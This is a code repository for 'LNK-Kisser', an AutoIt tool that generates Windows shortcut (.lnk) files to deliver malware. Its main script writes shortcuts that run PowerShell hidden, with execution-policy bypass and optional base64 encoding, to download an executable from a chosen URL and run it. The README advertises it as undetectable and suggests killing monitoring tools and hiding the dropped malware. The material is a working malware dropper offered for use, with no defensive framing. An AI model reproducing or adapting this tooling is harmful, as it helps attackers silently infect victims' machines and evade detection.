├── screenshot_lnkkisser.bmp ├── screenshot_lnkkisser_tcpview.bmp ├── README.md ├── base64.au3 ├── LNK-Kisser.au3 └── GUI.kxf /screenshot_lnkkisser.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/9aylas/Shortcut-Payload-Generator/HEAD/screenshot_lnkkisser.bmp -------------------------------------------------------------------------------- /screenshot_lnkkisser_tcpview.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/9aylas/Shortcut-Payload-Generator/HEAD/screenshot_lnkkisser_tcpview.bmp -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Shortcut-Payload-Generator 2 | - Exploiting Powershell to make ShortCut Payloads [fud]. 3 | - There is too much of awsome tricks there , u can make it better ^_^. 4 | - For Ex : Killing tcpview , taskmanager ..etc while downloading. 5 | - Set hidden attribs to the malware after downloading....etc 6 | - G00d by3. 7 | - ./9aylas 8 | 9 | 10 | ![alt text](screenshot_lnkkisser.bmp "huh") 11 | ![alt text](screenshot_lnkkisser_tcpview.bmp "hah") 12 | 13 | >EOF 14 | -------------------------------------------------------------------------------- /base64.au3: -------------------------------------------------------------------------------- 1 | Func _Base64Decode($Data) 2 | Local $Opcode = "0xC81000005356578365F800E8500000003EFFFFFF3F3435363738393A3B3C3DFFFFFF00FFFFFF000102030405060708090A0B0C0D0E0F10111213141516171819FFFFFFFFFFFF1A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132338F45F08B7D0C8B5D0831D2E9910000008365FC00837DFC047D548A034384C0750383EA033C3D75094A803B3D75014AB00084C0751A837DFC047D0D8B75FCC64435F400FF45FCEBED6A018F45F8EB1F3C2B72193C7A77150FB6F083EE2B0375F08A068B75FC884435F4FF45FCEBA68D75F4668B06C0E002C0EC0408E08807668B4601C0E004C0EC0208E08847018A4602C0E00624C00A46038847028D7F038D5203837DF8000F8465FFFFFF89D05F5E5BC9C21000" 3 | 4 | Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]") 5 | DllStructSetData($CodeBuffer, 1, $Opcode) 6 | 7 | Local $Ouput = DllStructCreate("byte[" & BinaryLen($Data) & "]") 8 | Local $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), _ 9 | "str", $Data, _ 10 | "ptr", DllStructGetPtr($Ouput), _ 11 | "int", 0, _ 12 | "int", 0) 13 | 14 | Return BinaryMid(DllStructGetData($Ouput, 1), 1, $Ret[0]) 15 | EndFunc 16 | 17 | Func _Base64Encode($Data, $LineBreak = 76) 18 | Local $Opcode = "0x5589E5FF7514535657E8410000004142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A303132333435363738392B2F005A8B5D088B7D108B4D0CE98F0000000FB633C1EE0201D68A06880731C083F901760C0FB6430125F0000000C1E8040FB63383E603C1E60409C601D68A0688470183F90176210FB6430225C0000000C1E8060FB6730183E60FC1E60209C601D68A06884702EB04C647023D83F90276100FB6730283E63F01D68A06884703EB04C647033D8D5B038D7F0483E903836DFC04750C8B45148945FC66B80D0A66AB85C90F8F69FFFFFFC607005F5E5BC9C21000" 19 | 20 | Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]") 21 | DllStructSetData($CodeBuffer, 1, $Opcode) 22 | 23 | $Data = Binary($Data) 24 | Local $Input = DllStructCreate("byte[" & BinaryLen($Data) & "]") 25 | DllStructSetData($Input, 1, $Data) 26 | 27 | $LineBreak = Floor($LineBreak / 4) * 4 28 | Local $OputputSize = Ceiling(BinaryLen($Data) * 4 / 3) 29 | $OputputSize = $OputputSize + Ceiling($OputputSize / $LineBreak) * 2 + 4 30 | 31 | Local $Ouput = DllStructCreate("char[" & $OputputSize & "]") 32 | DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), _ 33 | "ptr", DllStructGetPtr($Input), _ 34 | "int", BinaryLen($Data), _ 35 | "ptr", DllStructGetPtr($Ouput), _ 36 | "uint", $LineBreak) 37 | Return DllStructGetData($Ouput, 1) 38 | EndFunc -------------------------------------------------------------------------------- /LNK-Kisser.au3: -------------------------------------------------------------------------------- 1 | #cs 2 | 3 | Author : 9aylas 4 | From : Algeria , 16200 Hell 5 | Home : n/a 6 | 7 | Greet's To : AX302 , Ghosty , Erreur404 , Ramel , DebaAkrem , TheBen_xD , Zahir , TheHappyBit , ReDwan , Bellal , H-F ... 8 | And DzCyberSec Members. 9 | 10 | PS/0x1 : Where? ( emplacement ) is not working , ( it installs automatically in %appdata% ) another time i will add this featur 11 | or u can do it ,don't be a tree --' . 12 | 13 | PS/0x2 : you can change the icon ( just go here : http://help4windows.com/windows_7_shell32_dll.shtml ) 14 | and put ur icon number here : FileCreateShortcut .... i choosed ( 154 ) 15 | 16 | #ce 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #Include "base64.au3" 26 | #Region # GUI # Form=C:\Users\ByLka\Desktop\Form1.kxf 27 | $MWAH = GUICreate("LNK-Kisser", 376, 152, 192, 114) 28 | $url = GUICtrlCreateInput("https://www.lucifer.gov/payloads/malware.exe", 80, 40, 281, 21, BitOR($GUI_SS_DEFAULT_INPUT,$ES_CENTER)) 29 | GUICtrlSetColor(-1, 0xFF0000) 30 | $cum = GUICtrlCreateButton("Make it cum", 80, 120, 281, 21) 31 | GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif") 32 | $L0 = GUICtrlCreateLabel("Payload URL:", 8, 44, 70, 17) 33 | GUICtrlSetColor(-1, 0x000080) 34 | 35 | $location = GUICtrlCreateCombo("WHERE ?", 216, 64, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL,$CBS_OEMCONVERT)) 36 | 37 | GUICtrlSetData(-1, "APPDATA|TEMP|WINDOWS") 38 | GUICtrlSetFont(-1, 8, 400, 0, "Courier") 39 | GUICtrlSetColor(-1, 0xFF0000) 40 | $L4 = GUICtrlCreateLabel("Shortcut Payload Generator ", 80, 8, 285, 27) 41 | GUICtrlSetFont(-1, 14, 800, 0, "Century") 42 | GUICtrlSetColor(-1, 0x808080) 43 | 44 | $encoded = GUICtrlCreateRadio("Encoded Command", 232, 96, 121, 17) 45 | GUICtrlSetState(-1, $GUI_CHECKED) 46 | $notcoded = GUICtrlCreateRadio("Not Encoded", 80, 96, 81, 17) 47 | 48 | $hihihihihi = GUICtrlCreateIcon("C:\Windows\System32\shell32.dll", -123, 24, 8, 32, 32) 49 | $exename = GUICtrlCreateInput("anything.exe", 80, 64, 113, 21, BitOR($GUI_SS_DEFAULT_INPUT,$ES_CENTER)) 50 | GUICtrlSetColor(-1, 0xFF0000) 51 | $L3 = GUICtrlCreateLabel("Exe Name :", 8, 68, 62, 17) 52 | GUICtrlSetColor(-1, 0x000080) 53 | $L2 = GUICtrlCreateLabel("Payload Enc:", 8, 96, 67, 17) 54 | GUICtrlSetColor(-1, 0x000080) 55 | $aboutme = GUICtrlCreateButton("About ?", 8, 120, 65, 21) 56 | $L1 = GUICtrlCreateLabel("(Base64)", 176, 96, 46, 17) 57 | GUICtrlSetState(-1, $GUI_DISABLE) 58 | GUISetState(@SW_SHOW) 59 | 60 | While 1 61 | $nMsg = GUIGetMsg() 62 | Switch $nMsg 63 | Case $GUI_EVENT_CLOSE 64 | Exit 65 | 66 | case $cum 67 | doit() 68 | case $aboutme 69 | MsgBox(0,"About ?"," * LNK-Kisser is a Powershell Payload Generator *" & @CRLF & @CRLF & "Make your exe file hidden into shitty Shourtcut.lnk" &@crlf& "Automatically ready for a silent execution." &@crlf& "Plus Bypassing (Administrator Rights)." &@crlf& "Hidden while the process." &@crlf& ""&@crlf& "#E0F") 70 | 71 | EndSwitch 72 | WEnd 73 | 74 | 75 | 76 | func doit() 77 | 78 | if GUICtrlRead($encoded) = $GUI_CHECKED Then 79 | 80 | $payx = "payload_encoded" 81 | $x0x3d= "(New-Object System.Net.WebClient).DownloadFile('" &GUICtrlRead($url)& "','" &GUICtrlRead($exename)&" '); Start-Process '" &GUICtrlRead($exename)& "'" 82 | ;$x0x3d="(New-Object System.Net.WebClient).DownloadFile('" &GUICtrlRead($url)& "','%APPDATA%\" &GUICtrlRead($exename)& "'); cmd /c '%APPDATA%\" &GUICtrlRead($exename)& "'" 83 | $b0xit = _Base64Encode( StringToBinary ($x0x3d,$SB_UTF16LE)) 84 | 85 | FileCreateShortcut("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",""&$payx& ".lnk","","-NoP -NonI -Exec Bypass -W Hidden -ExecutionPolicy bypass -noprofile -EncodedCommand " & $b0xit ,"","c:\windows\system32\shell32.dll","","154") 86 | IF @ERROR then 87 | msgbox(16,"Error",@error) 88 | Else 89 | MsgBox(0,"Settings"," Host : " &GUICtrlRead($url) & @crlf& " Malware Name : " &GUICtrlRead($exename) & @CRLF& " Payload here : " &@ScriptDir&"\" &$payx& ".lnk") 90 | MsgBox(0,'','Success, Your LNK Payload is ready ') 91 | EndIf 92 | 93 | Else 94 | If GUICtrlRead($notcoded) = $GUI_CHECKED Then 95 | $pay = "payload" 96 | FileCreateShortcut("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ""&$pay& ".lnk","","-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('" &GUICtrlRead($url)& "','%APPDATA%\" &GUICtrlRead($exename)& "'); cmd /c '%APPDATA%\" &GUICtrlRead($exename)& "'","","c:\windows\system32\shell32.dll","","154") 97 | if @error Then 98 | msgbox(16,"Error",@error) 99 | Else 100 | MsgBox(0,"Settings"," Host : " &GUICtrlRead($url) & @crlf& " Malware Name : " &GUICtrlRead($exename) & @CRLF& " Payload here : " &@ScriptDir&"\" &$pay& ".lnk") 101 | MsgBox(0,'','Success , Your LNK Payload is ready ') 102 | EndIf 103 | 104 | EndIf 105 | EndIf 106 | 107 | EndFunc 108 | -------------------------------------------------------------------------------- /GUI.kxf: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 192 5 | 114 6 | 383 7 | 178 8 | LNK-Kisser 9 | clBtnFace 10 | DEFAULT_CHARSET 11 | clWindowText 12 | -11 13 | MS Sans Serif 14 | 15 | False 16 | True 17 | -1798701056 18 | 256 19 | 1.04 20 | False 21 | False 22 | False 23 | False 24 | 0 25 | 1 26 | 0 27 | 0 28 | 29 | 96 30 | 13 31 | 32 | 33 | 34 | 35 | 80 36 | 40 37 | 281 38 | 21 39 | DEFAULT_CHARSET 40 | clRed 41 | -11 42 | MS Sans Serif 43 | 44 | False 45 | 0 46 | http://www.lucifer.gov/payloads/malware.exe 47 | 1342374017 48 | 512 49 | DockHeight 50 | 51 | 52 | 53 | 54 | 55 | 80 56 | 120 57 | 281 58 | 21 59 | Make it cum 60 | DEFAULT_CHARSET 61 | clWindowText 62 | -11 63 | MS Sans Serif 64 | fsBold 65 | False 66 | 1 67 | clBtnFace 68 | 1342373888 69 | 0 70 | DockWidth, DockHeight 71 | 72 | 73 | 74 | 75 | 76 | 8 77 | 44 78 | 70 79 | 17 80 | Payload URL: 81 | DEFAULT_CHARSET 82 | clNavy 83 | -11 84 | MS Sans Serif 85 | 86 | False 87 | 2 88 | False 89 | 1342308608 90 | 0 91 | 92 | 93 | 94 | 95 | 96 | 97 | 216 98 | 64 99 | 145 100 | 25 101 | ANSI_CHARSET 102 | clRed 103 | -11 104 | Courier 105 | 106 | 13 107 | False 108 | 3 109 | WHERE ? 110 | 111 | 112 |
  • APPDATA
    • 113 |
  • TEMP
    • 114 |
  • WINDOWS
    • 115 |     116 |     117 | 1342374594 118 | 0 119 | DockHeight 120 |     121 | 122 |     123 | 124 | 125 | 80 126 | 8 127 | 285 128 | 27 129 | Shortcut Payload Generator 130 | ANSI_CHARSET 131 | clGray 132 | -19 133 | Century 134 | fsBold 135 | False 136 | 4 137 | False 138 | 1342308608 139 | 0 140 | 141 | 142 | 143 | 144 | 145 | 146 | 232 147 | 96 148 | 121 149 | 17 150 | Encoded Command 151 | True 152 | 5 153 | True 154 | 1342242825 155 | 0 156 | DockHeight 157 | 158 | 159 | 160 | 161 | 162 | 80 163 | 96 164 | 81 165 | 17 166 | Not Encoded 167 | 6 168 | 1342242825 169 | 0 170 | DockHeight 171 | 172 | 173 | 174 | 175 | 176 | 24 177 | 8 178 | 32 179 | 32 180 | 1342374147 181 | 0 182 | C:\Windows\System32\shell32.dll 183 | 122 184 | DockWidth, DockHeight 185 | 7 186 | 187 | 188 | 189 | 190 | 191 | 80 192 | 64 193 | 113 194 | 21 195 | DEFAULT_CHARSET 196 | clRed 197 | -11 198 | MS Sans Serif 199 | 200 | False 201 | 8 202 | anything.exe 203 | 1342374017 204 | 512 205 | DockHeight 206 | 207 | 208 | 209 | 210 | 211 | 8 212 | 68 213 | 62 214 | 17 215 | Exe Name: 216 | DEFAULT_CHARSET 217 | clNavy 218 | -11 219 | MS Sans Serif 220 | 221 | False 222 | 9 223 | False 224 | 1342308608 225 | 0 226 | 227 | 228 | 229 | 230 | 231 | 232 | 8 233 | 96 234 | 67 235 | 17 236 | Payload Enc: 237 | DEFAULT_CHARSET 238 | clNavy 239 | -11 240 | MS Sans Serif 241 | 242 | False 243 | 10 244 | False 245 | 1342308608 246 | 0 247 | 248 | 249 | 250 | 251 | 252 | 253 | 8 254 | 120 255 | 65 256 | 21 257 | About ? 258 | 11 259 | clBtnFace 260 | 1342373888 261 | 0 262 | DockWidth, DockHeight 263 | 264 | 265 | 266 | 267 | 268 | 176 269 | 96 270 | 46 271 | 17 272 | (Base64) 273 | False 274 | 12 275 | False 276 | 1342308608 277 | 0 278 | 279 | 280 | 281 | 282 |     283 |     --------------------------------------------------------------------------------